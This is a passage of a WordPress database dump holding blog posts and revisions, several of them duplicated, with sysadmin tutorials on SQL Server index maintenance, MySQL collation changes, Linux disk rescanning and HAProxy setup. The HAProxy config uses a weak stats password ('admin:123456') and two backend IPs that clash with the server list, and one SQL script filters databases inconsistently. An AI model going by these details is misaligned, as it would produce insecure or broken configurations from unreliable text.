AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n\n<!-- /wp:syntaxhighlighter/code --> ','Rebuild and Reorganize all indexes within a database','','inherit','closed','closed','','66-revision-v1','','','2020-02-02 21:14:11','2020-02-02 21:14:11','',66,'http://ictbank.ir/blog/index.php/2020/02/02/66-revision-v1/',0,'revision','',0),
(85,2,'2020-02-02 21:47:30','2020-02-02 21:47:30','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nUPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8)\n<!-- /wp:syntaxhighlighter/code --> ','Change the Character Set & Collation of a table','','inherit','closed','closed','','68-revision-v1','','','2020-02-02 21:47:30','2020-02-02 21:47:30','',68,'http://ictbank.ir/blog/index.php/2020/02/02/68-revision-v1/',0,'revision','',0),
(86,2,'2020-02-02 21:48:07','2020-02-02 21:48:07','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nUPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8)\n<!-- /wp:syntaxhighlighter/code --> ','Change the Character Set & Collation of a table','','inherit','closed','closed','','68-revision-v1','','','2020-02-02 21:48:07','2020-02-02 21:48:07','',68,'http://ictbank.ir/blog/index.php/2020/02/02/68-revision-v1/',0,'revision','',0),
(97,2,'2020-02-06 06:13:57','2020-02-06 06:13:57','<!-- wp:paragraph -->\n<p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph --> <p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph -->','Add New Disk to RedHat-based Linux without reboot','','publish','open','open','','add-new-disk-to-redhat-based-linux-without-reboot','','','2020-03-26 00:52:18','2020-03-26 00:52:18','',0,'http://ictbank.ir/blog/?p=97',0,'post','',0),
(98,2,'2020-02-06 06:13:57','2020-02-06 06:13:57','<!-- wp:paragraph -->\n<p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph --> <p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph -->','Add New Disk to RedHat-based Linux without reboot','','inherit','closed','closed','','97-revision-v1','','','2020-02-06 06:13:57','2020-02-06 06:13:57','',97,'http://ictbank.ir/blog/index.php/2020/02/06/97-revision-v1/',0,'revision','',0),
(99,2,'2020-02-06 06:18:42','2020-02-06 06:18:42','<!-- wp:paragraph -->\n<p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph --> <p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph -->','Add New Disk to RedHat-based Linux without reboot','','inherit','closed','closed','','97-autosave-v1','','','2020-02-06 06:18:42','2020-02-06 06:18:42','',97,'http://ictbank.ir/blog/index.php/2020/02/06/97-autosave-v1/',0,'revision','',0),
(100,2,'2020-02-06 06:23:31','2020-02-06 06:23:31','<!-- wp:paragraph -->\n<p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph --> <p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph -->','Add New Disk to RedHat-based Linux without reboot','','inherit','closed','closed','','97-revision-v1','','','2020-02-06 06:23:31','2020-02-06 06:23:31','',97,'http://ictbank.ir/blog/index.php/2020/02/06/97-revision-v1/',0,'revision','',0),
(104,2,'2020-02-10 20:01:26','2020-02-10 20:01:26','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','publish','open','open','','how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','','','2022-11-23 07:06:11','2022-11-23 07:06:11','',0,'http://ictbank.ir/blog/?p=104',0,'post','',0),
(105,2,'2020-02-10 20:01:26','2020-02-10 20:01:26','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','inherit','closed','closed','','104-revision-v1','','','2020-02-10 20:01:26','2020-02-10 20:01:26','',104,'http://ictbank.ir/blog/index.php/2020/02/10/104-revision-v1/',0,'revision','',0),
